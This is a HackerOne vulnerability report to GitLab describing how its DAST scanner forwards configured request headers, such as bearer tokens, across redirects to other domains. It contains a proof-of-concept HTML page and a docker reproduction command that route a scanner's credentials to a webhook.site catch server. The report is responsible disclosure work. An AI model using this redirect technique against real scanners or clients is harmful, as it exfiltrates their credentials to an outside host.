DAST analyzer includes custom request headers in redirects
HackerOne report #1767533 by joaxcar
on 2022-11-08, assigned to @greg:
Report | Attachments | How To Reproduce
Report
Summary
The latest release 15.5.2 contained a fix for the DAST scanner made to block the scanner from sending custom request headers in every request. Leading to leaked headers. This seems to work, but the scanner still includes the headers if any link redirects to another URL
Take this page as an example https://joaxcar.com/scan.html it contains this HTML:
<html>
<head>
<link rel="stylesheet" href="https://joaxcar.com/redirects/no_cors.php?url=https://webhook.site/REDACTED" />
</head>
<body>
</body>
</html>
This page contains a CSS link that is on the same URL, but that will make a redirect to my webhook. This will have the DAST scanner send the configured headers to the webhook URL and thus leaking any credentials.
This is a bit of a forced example, using CSS, but it will have the same effect if it is a link or any other thing the scanner will follow.
Steps to reproduce
This will happen if you configure this in the gitlab.com UI as either a build step or a on demand scan. But it is easier to prove by using the DAST scanner directly.
- Use this link to test the leak. Add a catch server as the URL param
https://joaxcar.com/scan.php?url=https://WEBHOOK.SITE
- Run this command and replace target with the link you created in step 1
docker run --privileged=true --interactive --tty --rm \
--env DAST_REQUEST_HEADERS='Authorization: Bearer secret-token' \
--env DAST_ZAP_CONNECT_SLEEP_SECONDS='5' \
--env DAST_FULL_SCAN_ENABLED=true \
--env DAST_BROWSER_SCAN=true \
registry.gitlab.com/gitlab-org/security-products/dast:latest /analyze -d \
-t https://joaxcar.com/scan.php?url=https://webhook.site/REDACTED \
-r report.html
- Your catch server should now have two requests, both containing the auth header containing
secret token
(the scan will first fetch the CSS and then also make a spider request directly to the URL)
Impact
DAST scanner still leak configured headers to other domains if encountering a redirect
What is the current bug behavior?
Redirects are not filtered
What is the expected correct behavior?
The same as for regular of site links
Output of checks
This bug happens on GitLab.com
Impact
DAST scanner still leak configured headers to other domains if encountering a redirect
Attachments
How To Reproduce
Please add reproducibility information to this section: